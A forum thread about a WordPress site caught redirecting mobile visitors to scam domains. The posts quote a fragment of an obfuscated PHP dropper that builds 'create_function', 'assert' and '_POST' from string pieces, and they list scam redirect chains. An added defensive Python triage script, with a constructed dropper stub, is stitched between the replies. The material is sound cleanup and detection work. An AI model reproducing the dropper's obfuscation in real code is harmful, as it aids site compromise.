If you like DNray Forum, you can support it by - BTC: bc1qppjcl3c2cyjazy6lepmrv3fh6ke9mxs7zpfky0 , TRC20 and more...

 

Caught in a Redirect Loop: How I Tried to Fix My Site's Issues

Started by Knorneshoote, Aug 23, 2024, 12:52 AM


Knorneshoote (Topic starter)

I got a "happy letter" from Google, saying my site is a threat to users, so I went to check in Google Webmaster and found a critical issue:

The site uses methods that mislead mobile internet users – for example, it replaces the content indexed by the search robot and/or redirects visitors to pages with subscriptions to paid content services.

I reached out to support, and they told me that sometimes the mobile version of the site redirects to scammy sites, and I need to fix it. If everything's ok in 2-3 months, they'll lift the restrictions.

After trying some queries that lead to my site in search, I eventually managed to catch a redirect:

w3-org.cc --- bestprizes-box.life --- givemelove17.live --- mobile-app-market-here1.life --- adaranth.com --- extraordinaryprizes.com

Sometimes you go in, and next time, there's a different redirect:

bestdealfor1.life ---- e.bestdealfor1.life --- f.bestdealfor1.life --- g.bestdealfor1.life ---- h.bestdealfor1.life ---- secure.umredirect.com ---- tropd.com

There are other chains of sites as well.

I also caught something similar on 4 more of my sites (maybe it's not the end).

I used the built-in AI-Bolit antivirus on my hosting and found the following on many sites:

/wp-includes/js/tinymce/langs/77711746.phtml

with the following malicious code:

cution_time',0);ini_set('display_errors',0);error_reporting(0);set_time_limit(0);$cret='unction';$cret='create_f'.$cret; $jQuery='sert';$jQuery='as'.$jQuery;$Libr="_ostp";$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3]);if(iss

I deleted this file everywhere; there were also some other strange files in the folder (which weren't on those sites where this script wasn't found). I deleted them too.

Thinking I fixed the redirect issue, I wrote to Google and got a standard reply that if everything's fine, the mark will be removed in 2-3 months...

Now, I've found out that the redirect hasn't gone away. Can anyone explain what the cause might be? Do I understand correctly that the reason isn't in this malicious code I found? Or is it in that, but I missed something when deleting?

NolizozyPeali

The fact that you are still experiencing the redirects even after deleting the malicious files indicates that the root of the problem hasn't been fully resolved. It's possible that the malicious code is still hiding somewhere on your site, or even on your server. Attackers often plant backdoors in various locations, which allows them to regain access even after you remove the initial malware.

Here are a few steps you should take to try and get to the bottom of it:

Check all site files: The code you found in /wp-includes/js/tinymce/langs/77711746.phtml is just one part of the puzzle. Hackers might have added similar files in other directories as well, or even modified existing files. You'll want to thoroughly check all your directories, especially in places like /wp-content/uploads/, /wp-includes/, and even your theme and plugin directories.

Inspect the database: Sometimes, malicious code is injected into the database. Check for any unusual records in the wp_options, wp_posts, and wp_usermeta tables, as these are common targets. Look for strange URLs, base64 encoded strings, or any other code that looks out of place.

Check .htaccess file: Hackers often use the .htaccess file to set up redirects. Make sure to check it for any suspicious rules or redirects that shouldn't be there. If you find anything fishy, remove it, but make sure to take a backup first.

Update everything: Ensure that your WordPress installation, plugins, themes, and even your server software are up-to-date. Many hacks exploit known vulnerabilities that are fixed in later updates. If you have outdated software, it's an open door for attackers.

Change passwords: Change all your passwords, including your WordPress admin, FTP, database, and hosting account. Use strong, unique passwords for each.

Scan for backdoors: It's possible that the hackers have installed backdoors that allow them to regain access after you've cleaned your site. You might need a more robust scanner than AI-Bolit to find these. Tools like Wordfence or Sucuri can help scan for and remove backdoors.

Check server logs: Review your server logs to see if you can spot any unusual activity that might give you clues about how the site was compromised. Look for strange IPs, unexpected POST requests, or any scripts being called that shouldn't be.

Consider a full reinstall: If you continue to find issues, it might be best to take the nuclear option. Backup your site content, and do a full reinstall of WordPress. Re-upload clean copies of your theme and plugins, and restore your content from backup. This is often the safest way to ensure all malware is gone.

The fact that the redirect hasn't gone away suggests that there's still some malicious code left, or that a backdoor is allowing the attacker to reinsert the code. The file you found is just one of the symptoms, not necessarily the root cause. You might have missed something or, more likely, the hacker has multiple entry points.
You're probably dealing with more than just the one malicious file you found. Hackers often leave several layers of infection to maintain control over a site. Follow the steps above to thoroughly clean your site and prevent further issues.
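
The two posts above describe the same triage problem from both ends: the topic starter found a name-building dropper (`$cret='create_f'.'unction'`, `$jQuery='as'.'sert'`, `_ostp` reordered into `_POST`) in a directory that should hold no PHP, and the reply lists what to sweep next (all directories, server logs for unexpected POSTs). The script below is an added example, not code from the thread or from any scanner mentioned in it. It resolves those simple concatenation chains so that obfuscated call names surface, flags PHP in directories where stock WordPress never executes it, and pulls POST requests to unexpected PHP targets out of access-log lines. The sample files, log lines and directory layout are constructed for the demonstration; the combined log format is an assumption.

```python
"""Triage helpers for a WordPress tree hit by a redirect dropper (added example, not from the thread).
Sample files and log lines are constructed to resemble the indicators described in the posts."""
import re
import tempfile
from pathlib import Path, PurePosixPath

# Call names that obfuscated droppers typically assemble from string pieces.
DANGEROUS = ("create_function", "assert", "eval", "base64_decode", "gzinflate", "str_rot13")
# Stock WordPress never executes PHP from these directories (assumed layout).
NO_PHP_DIRS = ("wp-includes/js", "wp-content/uploads")
PHP_EXT = {".php", ".phtml", ".php5", ".php7", ".phar"}

# Matches  $name = 'lit' . "lit" . $other ;  (string literals and variables only)
_PIECE = r"'[^']*'|\"[^\"]*\"|\$\w+"
ASSIGN = re.compile(rf"\$(\w+)\s*=\s*((?:{_PIECE})(?:\s*\.\s*(?:{_PIECE}))*)\s*;")
PIECE = re.compile(_PIECE)

def resolve_string_vars(src):
    """Follow concatenation chains: $cret='unction';$cret='create_f'.$cret;
    yields {'cret': 'create_function'}. Unknown variables resolve to ''."""
    vals = {}
    for name, expr in ASSIGN.findall(src):
        out = ""
        for piece in PIECE.findall(expr):
            out += vals.get(piece[1:], "") if piece.startswith("$") else piece[1:-1]
        vals[name] = out
    return vals

def scan_php_source(src):
    """Return human-readable findings for one PHP source string."""
    findings = []
    for name, value in resolve_string_vars(src).items():
        if value in DANGEROUS:
            findings.append(f"obfuscated call name: ${name} resolves to {value}")
    findings += [f"direct call to {fn}()" for fn in DANGEROUS if re.search(rf"\b{fn}\s*\(", src)]
    # A name assembled from indexed characters, e.g. strtoupper($l[0].$l[4].$l[1]...)
    if re.search(r"strtoupper\s*\(\s*\$\w+\[\d+\](?:\s*\.\s*\$\w+\[\d+\])+", src):
        findings.append("name assembled from indexed characters (likely a superglobal)")
    if "error_reporting(0)" in src and "set_time_limit(0)" in src:
        findings.append("error suppression plus unlimited runtime (weak indicator)")
    return findings

def scan_tree(root):
    """Walk a WordPress tree; return {relative_path: [findings]} for suspicious PHP files."""
    root, report = Path(root), {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PHP_EXT:
            continue
        rel = path.relative_to(root).as_posix()
        findings = ["PHP file in a directory that should hold no PHP"] if any(
            rel.startswith(d + "/") for d in NO_PHP_DIRS) else []
        findings += scan_php_source(path.read_text(errors="replace"))
        if findings:
            report[rel] = findings
    return report

def unexpected_php_target(url_path):
    """True for a PHP-like request target WordPress never serves legitimately:
    a non-.php PHP extension anywhere, or any PHP under the no-PHP directories."""
    suffix = PurePosixPath(url_path).suffix.lower()
    if suffix not in PHP_EXT:
        return False
    return suffix != ".php" or any(url_path.startswith("/" + d + "/") for d in NO_PHP_DIRS)

# Combined log format (assumed): ip ident user [time] "METHOD target proto" status ...
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+)[^"]*" (\d{3})')

def suspicious_log_lines(lines):
    """Return (client_ip, path) for POST requests to unexpected PHP targets."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        if m:
            ip, method, target, _status = m.groups()
            path = target.split("?", 1)[0]
            if method == "POST" and unexpected_php_target(path):
                hits.append((ip, path))
    return hits

# Constructed samples: a clean plugin file, and a dropper stub that builds its
# names the way the snippet in the thread does (name assembly only, no payload).
SAMPLE_CLEAN = "<?php\nfunction hello() { return 'hi'; }\n"
SAMPLE_DROPPER = ("<?php\n@ini_set('max_execution_time',0);error_reporting(0);set_time_limit(0);\n"
                  "$cret='unction';$cret='create_f'.$cret;$jQuery='sert';$jQuery='as'.$jQuery;\n"
                  "$Libr=\"_ostp\";$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3]);\n")
SAMPLE_LOG = [  # constructed access-log lines, documentation (RFC 5737) addresses
    '203.0.113.7 - - [22/Aug/2024:03:14:07 +0000] "POST /wp-includes/js/tinymce/langs/77711746.phtml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Aug/2024:03:15:10 +0000] "GET /wp-content/uploads/2024/08/photo.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Aug/2024:03:16:42 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [22/Aug/2024:03:20:01 +0000] "POST /wp-content/uploads/2024/08/cache.php HTTP/1.1" 200 77 "-" "curl/8.0"',
]

def build_demo_tree():
    """Write the constructed samples into a temporary WordPress-like tree; return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    for rel, body in (("wp-content/plugins/hello/hello.php", SAMPLE_CLEAN),
                      ("wp-includes/js/tinymce/langs/77711746.phtml", SAMPLE_DROPPER)):
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root

if __name__ == "__main__":
    for rel, findings in scan_tree(build_demo_tree()).items():
        print(rel, "->", "; ".join(findings))
    for ip, path in suspicious_log_lines(SAMPLE_LOG):
        print("POST from", ip, "to", path)
```

Point `scan_tree()` at the document root of each affected site and `suspicious_log_lines()` at the raw access log; a client IP that POSTs to a flagged file is the one to trace backwards in the log to find the request that dropped it. The resolver only follows literal and variable concatenation, so the `strtoupper` character-index trick is matched as a pattern rather than evaluated; anything built with `chr()`, `base64_decode()` or `str_rot13()` is caught only by the direct-call check. Treat the weak indicator as a reason to read the file, not as proof on its own.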

MypeWeelo

Like, the redirect thing, it might still be there; maybe it's just stuck in your computer cache or something. Or maybe it didn't actually go anywhere, it's just hiding. You can check if the file is still there, or maybe the site got re-infected, like, in the same spot or somewhere else.

Or, you know, maybe it's something else entirely...

Anyway, it's hard to say without taking a closer look, like examining the patient, or in this case, the site. You've got to dig deeper, like check the logs, and the files, and all that jazz. It's like a mystery, and you've got to solve it, or else the problem will just keep coming back, like a bad penny.

And, by the way, it's always a good idea to keep your site and computer up to date, like, with the latest security patches and all that. It's like a good way to prevent this kind of thing from happening in the first place.

asdert12

Make sure to update all of your scripts. This means removing any old or potentially compromised files, and then uploading fresh, clean versions of WordPress scripts and plugins. This step ensures that no remnants of old, vulnerable code remain on your server.

Next, monitor your logs closely. Look for any unusual activity that could indicate an attempt to upload a malicious shell. By reviewing these logs, you can identify which scripts were accessed and pinpoint any suspicious behavior.

Consider implementing an antibot tool, as suggested in my profile. If an attacker tries to access the WordPress configuration file (where the antibot settings are included), you'll be able to see these attempts in the antibot logs. This can help you catch and block malicious requests. However, if the attacker targets a specific plugin with known vulnerabilities, the antibot might not be effective, as it primarily guards against general bot activity rather than specific script exploits.

Adding an additional layer of security, such as regularly scanning for vulnerabilities and applying patches, can further strengthen your defenses against such attacks.

